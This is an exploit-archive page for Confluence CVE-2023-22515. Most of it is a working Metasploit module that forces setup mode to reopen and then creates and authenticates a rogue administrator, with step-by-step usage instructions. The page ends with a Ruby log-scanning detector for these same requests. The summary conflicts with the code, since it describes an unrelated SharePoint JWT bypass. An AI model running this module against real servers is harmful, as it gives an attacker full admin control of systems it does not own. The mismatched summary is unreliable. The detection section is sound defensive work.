
📄 Confluence 8.x Privilege Escalation

🗓️ 26 Nov 2025 00:00:00 | Reported by indoushka | Type: packetstorm | 🔗 packetstorm.news | 👁 150 Views

Confluence 8.x privilege escalation using an authentication bypass with unsigned token to impersonate admin.

=============================================================================================================================================
    | # Title     : Confluence 8.x Privilege Escalation                                                                                         |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.atlassian.com/software/confluence                                                                               |
    =============================================================================================================================================
    
    POC : 
    
    1. Summary :
       A critical authentication bypass vulnerability in Microsoft SharePoint known as CVE-2023-29357 (https://packetstorm.news/files/id/207960/).
       The flaw allows an attacker to craft an unsigned JWT token with "alg": "none" and impersonate any SharePoint user, 
       including Site Administrators, without possessing valid credentials.
       The vulnerability is dangerous because it exposes internal SharePoint APIs and may enable privilege escalation or full system compromise.
    
    ===============
    # Save & Usage 
    ===============
    
    1. Save module as:
       modules/auxiliary/admin/http/confluence_cve_2023_22515.rb
    
    2. Reload Metasploit:
       msfconsole
       reload_all
    
    3. Use module:
       use auxiliary/admin/http/confluence_cve_2023_22515
    
    4. Set options:
       set RHOSTS https://target.com
       set TARGETURI /
       set USERNAME pleasepatch
       set PASSWORD Password2
    
    5. Run:
       run
    -------------------------
    auxiliary               :
    -------------------------
    ##
    # This file is part of the Metasploit Framework
    ##
    
    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking
    
      include Msf::Exploit::Remote::HttpClient
    
      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'Atlassian Confluence Unauthenticated Privilege Escalation (CVE‑2023‑22515)',
          'Description'    => %q{
            This module exploits CVE-2023-22515, an authentication bypass and setup
            reopening vulnerability in Atlassian Confluence Data Center and Server.
    
            An attacker can force Confluence into setup mode, then create a NEW
            administrator account and authenticate with full admin privileges.
    
            This module replicates the exact behavior of the PoC Python script:
            1- trigger vulnerability via /server-info.action?setupComplete=false
            2- create admin user
            3- authenticate via REST API
          },
          'Author'         => [
            'Chocapikk - PoC',     
            'indoushka - Full Metasploit conversion'
          ],
          'License'        => MSF_LICENSE,
          'References'     => [
            ['CVE', '2023-22515'],
            ['URL', 'https://github.com/Chocapikk/CVE-2023-22515']
          ],
          'Platform'       => 'linux',
          'Arch'           => ARCH_ALL,
          'Targets'        => [['Automatic', {}]],
          'DisclosureDate' => '2023-10-04',
          'DefaultTarget'  => 0
        ))
    
        register_options(
          [
            OptString.new('TARGETURI', [true, 'Base path', '/']),
            OptString.new('USERNAME',  [true, 'Admin username to create', 'pleasepatch']),
            OptString.new('PASSWORD',  [true, 'Admin password to create', 'Password2'])
          ]
        )
      end
    
      #
      # Check Vuln
      #
      def check
        v = trigger_setup
        return Exploit::CheckCode::Vulnerable if v
        Exploit::CheckCode::Safe
      end
    
      #
      # Exploit
      #
      def exploit
        print_status("Triggering setup mode bypass on target...")
        unless trigger_setup
          fail_with(Failure::NotVulnerable, 'Could not reopen setup mode.')
        end
    
        print_good("Setup mode reopened successfully ✔")
    
        print_status("Creating new administrator account...")
        unless create_admin
          fail_with(Failure::UnexpectedReply, 'Failed to create admin user')
        end
    
        print_good("Admin account created successfully ✔")
    
        print_status("Authenticating to REST API as #{datastore['USERNAME']} ...")
    
        if authenticate_user
          print_good("Successfully logged in as #{datastore['USERNAME']}! ✔ FULL ADMIN PWNED ✔")
        else
          fail_with(Failure::NoAccess, 'Authentication failed after account creation')
        end
      end
    
      #
      # Step 1 — Trigger vulnerability
      #
      def trigger_setup
        send_req(
          "GET",
          normalize_uri(target_uri.path, "server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false")
        )&.code == 200
      end
    
      #
      # Step 2 — Create Admin
      #
      def create_admin
        data = {
          "username" => datastore['USERNAME'],
          "fullName" => datastore['USERNAME'],
          "email" => "#{datastore['USERNAME']}@localhost",
          "password" => datastore['PASSWORD'],
          "confirm" => datastore['PASSWORD'],
          "setup-next-button" => "Next"
        }
    
        res = send_req("POST", normalize_uri(target_uri.path, "setup", "setupadministrator.action"), data)
    
        return false unless res
    
        if res.body.include?("Setup Successful") ||
           res.body.include?("A user with this username already exists")
          return true
        end
    
        false
      end
    
      #
      # Step 3 — Validate Login
      #
      def authenticate_user
        auth = Rex::Proto::Http::Client::BasicAuthHeader.new(
          datastore['USERNAME'],
          datastore['PASSWORD']
        )
    
        res = send_req(
          "GET",
          normalize_uri(target_uri.path, "rest/api/user?username=#{datastore['USERNAME']}"),
          nil,
          auth
        )
    
        return false unless res && res.code == 200
        true
      end
    
      #
      # Unified request
      #
      def send_req(method, uri, data=nil, auth=nil)
        begin
          send_request_cgi({
            'method' => method,
            'uri'    => uri,
            'ctype'  => 'application/x-www-form-urlencoded',
            'data'   => data,
            'authorization' => auth ? auth.to_s : nil,
            'headers' => {
              "X-Atlassian-Token" => "no-check",
              "User-Agent" => "Metasploit - CVE-2023-22515"
            }
          }, 5)
        rescue ::Rex::Error::RequestTimeout
          return nil
        end
      end
    end
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================
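
Detection logic for the requests the module above sends, as an added example that is not part of the original advisory or of Metasploit: it scans combined-format access log lines for the setup-reopen query, the POST to the setup administrator endpoint and the module's User-Agent, grouped by client IP. The log lines are constructed samples, and the status-code heuristic and the verdict labels (`escalate`, `attempt`, `tooling-only`) are assumptions of this example.

```ruby
# Constructed sample lines in combined log format (not from a real system).
SAMPLE_LOG = <<~'LOG'
  203.0.113.7 - - [26/Nov/2025:10:00:01 +0000] "GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1" 200 512 "-" "Metasploit - CVE-2023-22515"
  203.0.113.7 - - [26/Nov/2025:10:00:02 +0000] "POST /setup/setupadministrator.action HTTP/1.1" 200 2048 "-" "Metasploit - CVE-2023-22515"
  203.0.113.7 - - [26/Nov/2025:10:00:03 +0000] "GET /rest/api/user?username=pleasepatch HTTP/1.1" 200 301 "-" "Metasploit - CVE-2023-22515"
  198.51.100.9 - - [26/Nov/2025:10:05:00 +0000] "GET /wiki/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete%3Dfalse HTTP/1.1" 403 0 "-" "curl/8.4.0"
  192.0.2.10 - - [26/Nov/2025:10:06:00 +0000] "GET /server-info.action HTTP/1.1" 200 512 "-" "Mozilla/5.0"
LOG

LINE = /\A(?<ip>\S+) \S+ \S+ \[[^\]]+\] "(?<verb>[A-Z]+) (?<target>\S+) [^"]*" (?<status>\d{3}) \S+ "[^"]*" "(?<ua>[^"]*)"/

# Indicators taken from the module's requests; matching is case-insensitive
# and not anchored at the root, so a context path such as /wiki is covered.
STAGES = {
  setup_reopen: ->(r) { r[:target] =~ /setupcomplete\s*=\s*false/i },
  admin_create: ->(r) { r[:verb] == 'POST' && r[:target] =~ %r{/setup/setupadministrator\.action}i },
  module_ua:    ->(r) { r[:ua] =~ /CVE-2023-22515/i }
}.freeze

# One pass of percent-decoding so that %3D, %2E and similar do not hide a match.
def decode(target)
  target.b.gsub(/%(\h\h)/) { $1.hex.chr }
end

# Returns { client_ip => { stages: [...], verdict: String } } for IPs with hits.
def scan(lines)
  by_ip = Hash.new { |h, k| h[k] = [] }
  lines.each do |line|
    m = LINE.match(line) or next
    req = { verb: m[:verb], target: decode(m[:target]), ua: m[:ua] }
    hits = STAGES.select { |_, test| test.call(req) }.keys
    by_ip[m[:ip]] << { stages: hits, status: m[:status].to_i } unless hits.empty?
  end
  by_ip.transform_values do |events|
    seen = events.flat_map { |e| e[:stages] }.uniq
    # Assumption: a status below 400 means the server accepted that request.
    ok = events.select { |e| e[:status] < 400 }.flat_map { |e| e[:stages] }
    verdict = if ok.include?(:setup_reopen) && ok.include?(:admin_create) then 'escalate'
              elsif (seen & %i[setup_reopen admin_create]).any? then 'attempt'
              else 'tooling-only'
              end
    { stages: seen, verdict: verdict }
  end
end

if __FILE__ == $PROGRAM_NAME
  scan(SAMPLE_LOG.lines).each { |ip, f| puts "#{ip}\t#{f[:verdict]}\t#{f[:stages].join(',')}" }
end
```

The User-Agent indicator is the weakest of the three because a client can set it to anything; the setup-reopen query and the POST to the setup endpoint are the ones to alert on.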

Vulners AI Score: 7.2 (High risk) | CVSS 3.1: 9.8 | CVSS 3: 10 | EPSS: 0.99618